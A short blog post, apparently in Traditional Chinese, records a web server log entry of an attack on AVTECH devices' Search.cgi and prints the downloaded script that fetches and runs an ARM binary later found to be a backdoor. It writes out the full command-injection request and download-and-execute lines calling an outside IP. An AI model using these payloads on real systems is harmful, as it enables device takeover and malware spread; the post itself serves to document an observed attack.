77.240.102.116 - - [18/Oct/2018:08:46:34 +0800] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 226 "-" "Sefa"
下載來的 avtech 中的內容:
cd /tmp; wget http://209.141.40.213/bins/sefa.arm; chmod 777 sefa.arm; ./sefa.arm avtech.arm; rm -rf sefa.arm
內容表示繼續從同一個IP:209.141.40.213下載 sefa.arm 這個編碼過的程式然後執行
經掃描結果確定為後門
沒有留言:
張貼留言